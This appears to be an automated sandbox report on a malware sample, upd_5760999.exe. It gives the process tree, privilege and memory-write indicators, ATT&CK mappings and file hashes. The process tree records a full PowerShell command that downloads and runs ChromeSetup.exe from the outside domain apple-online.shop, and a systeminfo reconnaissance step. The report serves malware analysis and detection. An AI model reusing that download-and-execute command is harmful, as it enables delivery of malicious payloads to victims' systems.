2476	chrome.exe
2476	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4996	powershell.exe
Token: 33	2436	ChromeSetup.exe
Token: SeIncBasePriorityPrivilege	2436	ChromeSetup.exe
Token: 33	4384	128.0.6613.138_chrome_installer.exe
Token: SeIncBasePriorityPrivilege	4384	128.0.6613.138_chrome_installer.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe
Token: SeCreatePagefilePrivilege	2476	chrome.exe
Token: SeShutdownPrivilege	2476	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe
2476	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 784 wrote to memory of 4996	784	upd_5760999.exe	89
PID 784 wrote to memory of 4996	784	upd_5760999.exe	89
PID 784 wrote to memory of 1992	784	upd_5760999.exe	90
PID 784 wrote to memory of 1992	784	upd_5760999.exe	90
PID 1992 wrote to memory of 4692	1992	cmd.exe	93
PID 1992 wrote to memory of 4692	1992	cmd.exe	93
PID 4996 wrote to memory of 2436	4996	powershell.exe	97
PID 4996 wrote to memory of 2436	4996	powershell.exe	97
PID 4996 wrote to memory of 2436	4996	powershell.exe	97
PID 2436 wrote to memory of 5088	2436	ChromeSetup.exe	98
PID 2436 wrote to memory of 5088	2436	ChromeSetup.exe	98
PID 2436 wrote to memory of 5088	2436	ChromeSetup.exe	98
PID 5088 wrote to memory of 1768	5088	updater.exe	99
PID 5088 wrote to memory of 1768	5088	updater.exe	99
PID 5088 wrote to memory of 1768	5088	updater.exe	99
PID 1284 wrote to memory of 2600	1284	updater.exe	101
PID 1284 wrote to memory of 2600	1284	updater.exe	101
PID 1284 wrote to memory of 2600	1284	updater.exe	101
PID 3236 wrote to memory of 2848	3236	updater.exe	103
PID 3236 wrote to memory of 2848	3236	updater.exe	103
PID 3236 wrote to memory of 2848	3236	updater.exe	103
PID 3236 wrote to memory of 4384	3236	updater.exe	104
PID 3236 wrote to memory of 4384	3236	updater.exe	104
PID 4384 wrote to memory of 3040	4384	128.0.6613.138_chrome_installer.exe	105
PID 4384 wrote to memory of 3040	4384	128.0.6613.138_chrome_installer.exe	105
PID 3040 wrote to memory of 4908	3040	setup.exe	106
PID 3040 wrote to memory of 4908	3040	setup.exe	106
PID 3040 wrote to memory of 1892	3040	setup.exe	107
PID 3040 wrote to memory of 1892	3040	setup.exe	107
PID 1892 wrote to memory of 3228	1892	setup.exe	108
PID 1892 wrote to memory of 3228	1892	setup.exe	108
PID 5088 wrote to memory of 2476	5088	updater.exe	110
PID 5088 wrote to memory of 2476	5088	updater.exe	110
PID 2476 wrote to memory of 1228	2476	chrome.exe	111
PID 2476 wrote to memory of 1228	2476	chrome.exe	111
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112
PID 2476 wrote to memory of 220	2476	chrome.exe	112

C:\Users\Admin\AppData\Local\Temp\upd_5760999.exe
"C:\Users\Admin\AppData\Local\Temp\upd_5760999.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/ChromeSetup.exe\" -OutFile \"$env:TMP/ChromeSetup.exe\" ; & \"$env:TMP/ChromeSetup.exe\""
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4996
- - C:\Users\Admin\AppData\Local\Temp\ChromeSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Program Files (x86)\Google2436_328976925\bin\updater.exe
      "C:\Program Files (x86)\Google2436_328976925\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={02D45172-D451-34DF-2D04-55F1CF9E6911}&lang=en&browser=4&usagestats=0&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5088
    - - C:\Program Files (x86)\Google2436_328976925\bin\updater.exe
        
        "C:\Program Files (x86)\Google2436_328976925\bin\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=130.0.6679.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x121a6cc,0x121a6d8,0x121a6e4
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1768
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2476
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=128.0.6613.138 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb538e6c28,0x7ffb538e6c34,0x7ffb538e6c40
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=1956 /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:220
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2200,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4520
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2368,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4880
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=3152 /prefetch:1
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3316
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:1
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4704
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4336,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:1
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:872
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:1
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3588
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4876,i,622902977188912245,1849159539136705351,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3268
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c systeminfo
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1992
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4692

C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --system --windows-service --service=update-internal
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=130.0.6679.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x46a6cc,0x46a6d8,0x46a6e4
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2600

C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --system --windows-service --service=update
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3236
- C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=130.0.6679.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x25c,0x284,0x46a6cc,0x46a6d8,0x46a6e4
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2848
- C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\128.0.6613.138_chrome_installer.exe
  "C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\128.0.6613.138_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\a1c37862-5ad4-4c57-8c04-319a6d67cfa0.tmp"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4384
- - C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe
    "C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe" --install-archive="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\a1c37862-5ad4-4c57-8c04-319a6d67cfa0.tmp"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Network Configuration Discovery: Internet Connection Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe
      "C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=128.0.6613.138 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff7d2ac46b8,0x7ff7d2ac46c4,0x7ff7d2ac46d0
      4⤵
      Executes dropped EXE
      PID:4908
  - - C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe
      "C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of WriteProcessMemory
      PID:1892
    - - C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe
        
        "C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=128.0.6613.138 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff7d2ac46b8,0x7ff7d2ac46c4,0x7ff7d2ac46d0
        5⤵
        Executes dropped EXE
        
        PID:3228

C:\Program Files\Google\Chrome\Application\128.0.6613.138\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\128.0.6613.138\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4512

C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --system --windows-service --service=update
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5004
- C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=130.0.6679.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0xbc,0x284,0x46a6cc,0x46a6d8,0x46a6e4
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:3784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google2436_328976925\bin\updater.exe

Filesize
4.7MB

MD5
c583e91ddee7c0e8ac2a3d3aacad2f4c

SHA1
3d824f6aa75611478e56f4f56d0a6f6db8cb1c9b

SHA256
7f67129760223e5ddf31219f0b2e247555fbac85f4b6f933212ac091a21debf9

SHA512
0edbc9a7e3b6bf77d9a94242ee88b32af1b1f03c248290e750f355e921f49d62af13acfeed118ec624fb3e2c6131226ac17bb3d206316b056c1f7cf55642e069

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\settings.dat

Filesize
40B

MD5
49d6852f17160bcc13e8e5ec835bbd82

SHA1
4b3086cf73996b0c8397235d57249ae6ca66d3fa

SHA256
7a5c54cfc39c65ca0c97c6bd21a5b042d0a521d1cf5d2687bc9183bffdc02f53

SHA512
c6768ab24626d23f76a8deaeed1815c397a9642c28ed6db31579a661690d8fd6f20c788b131bf9f83cf382897e468b75519a361eaca98ab63c045fd3c0ce6840

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
500B

MD5
bb151f35c7d043063b5ce68a04a96d58

SHA1
2dc4577c0fd5608e1a2213fdf1665e70f28187a7

SHA256
9217e939b0415c9a6f065187115c4327be7d21633f9a0d459c39ff4c186b8eda

SHA512
9877331c7043f543db881307681925ac62e102c6bc18a66fa465a19c6bd61035f23876d0e64d41879d49f34b095fd80c5d37e6f903889bc35b5264d465846b0b

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
354B

MD5
227350f44c11f7dc5e4229d041dfa72f

SHA1
66f6d2bfd37e6b9df9ead8c40500db5fbd4ea9ba

SHA256
e82892f132a5432c6e8c02d6f36faea67b272497cbc82c5f0cfabde79372ac7e

SHA512
6231d93293181be9e398a2e811a0e5a0b141fd8a02523656b6c6e6740e6aab37d53139c1cd3c30b9cc0b1dac187d594189ae0131e5f44b2739de74c5c1fa146d

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
600B

MD5
97207adcc4c5e12f015040c487cf310e

SHA1
de1116f3568bc2bafec2f847ef2e2025fb44add8

SHA256
3edef8f9b55114072418347e7a87da4218594eab4d6bbc5944bf25a2a971a9a9

SHA512
307e8d893dc7cb6aadc4c8236c25c8037d41585b212e6da98989f6f09712f5d681b63532094eb87312e647a3019b39416db48b7236b5b56e299fe9de65fc70e5

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
600B

MD5
e1377cb2b56033bfff8ffc57c99af9a6

SHA1
463d03e08460f83cf13510dc098fc9fd8ef3f20f

SHA256
65856db6a57bffa7e704f93b7614e4f7b9eeb60c56507298be8c1a1acae44d2b

SHA512
71ae3558ff4e83033e21deaf59388f75c496eff6cc93b712963dcdcd6c82fac70aab8ff10bf10f3659572cac49551d2c6fa05032021b22f405561beb3abb1bf3

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
49B

MD5
c88c3ad52765a523b2b598bf2c5a9216

SHA1
4ebada495c7ec0e2ae7d92aa2be7c049d2b0e512

SHA256
e450a8d057f11bb4cd98343448b3fd8a70b0f22bd7eb6b84b6fb03731b36fc32

SHA512
a21348e047b3e84ce8a14a6298f518d1c4f512a7155360e1d85121d77ab9b4d51d09dbe67e6aad5a19b758f69b1a177a54c2e848de23d6cb66f6c7ff9b2c40b5

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
1KB

MD5
2c8485e8b6adb59459bf50ad3bab19f2

SHA1
9b1d0cf89ff521536e944fb542bbc7726933d1d9

SHA256
38610dc6822da403ff31de42ba111d91e15c67710d7dc5fddb5374716aa5d2a0

SHA512
cff4ac0bcda43f0ec330ef6cb4b34e814f5a96605e89b80e2ee0f9a167f56ffccad3080547c0efa2ceee29f849cb2239fb55182b2045ac49a894fedca8b812da

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
1KB

MD5
b8aee3ee75f1c0d89732b2450e241438

SHA1
8bc493efdfbde1f7f439e41ec69bebe085886b41

SHA256
0bb1a69d47e00047fbc70004435a366506a82c4f113d1e8587f9a5ae9394c29b

SHA512
10399b6ef6833fc90b6bb4c90f3b6b4af134e12d6fdf116ed2c93b989aebaefc7ba974be159530ef29ddd995358f0a2d7ffaab0c5d766b1c4f7b4f6bece1bada

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
4KB

MD5
c9d82ea09118c2b8adfdd8f7dd4929b6

SHA1
4b1cbaad5e00d5a3c5e58803dcb72b4c579e1936

SHA256
6b3c287a0351b07ff565bb5e2f37196b641624cadfc948629c753ceadeb0a813

SHA512
f2c371d182968a59db78636298a087ff1277113976ab6df52265e1fa99fe32a79ef6af92cfca3ba2554b3adc70462b1053e366dd8083d9241701d228895d85ec

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
5KB

MD5
c1286586b3bde6e64ec8fafcc8f4d48c

SHA1
227e7ca298845c8724d93842bf8fa0c6aca32a15

SHA256
77e032aba722225ff1006a83a81d5aad6fca0006abde43361d5e6cba6286ce4a

SHA512
d99e7cb1a0db0dac0ecc6236adab51a9f1bee01933e1a1626fdd2a9294fcd6e90a6fecc8e33dbb8a06c345de5538f6faef78b82364838a17a63deb1977c1b3ff

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
10KB

MD5
c76300b528ebdbe120e3189301b6887e

SHA1
e7b559e935ac0b3c97f385c2363caf5e1bbedf81

SHA256
7955c4876233af76d634f2dfc106d79948da3d946570347166124ff1a403265a

SHA512
1972aed8d0db45a2b8eb1b0755bc79393874fe46a60bf6ba6f06bc44b8f4da2ff8da3b9e4ed1cc23d6c7ebfedf8f69f9fbd8a7a7c0a1d35959bc502fa9fd2b85

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
10KB

MD5
649a912b9de29b5674f74687d624c527

SHA1
2b2a75cd8bc560af8d22489af5546f2e59cb330f

SHA256
8466aaea00e700b2f512bc24d9bdac31e44010c356f157ac92aa870809259026

SHA512
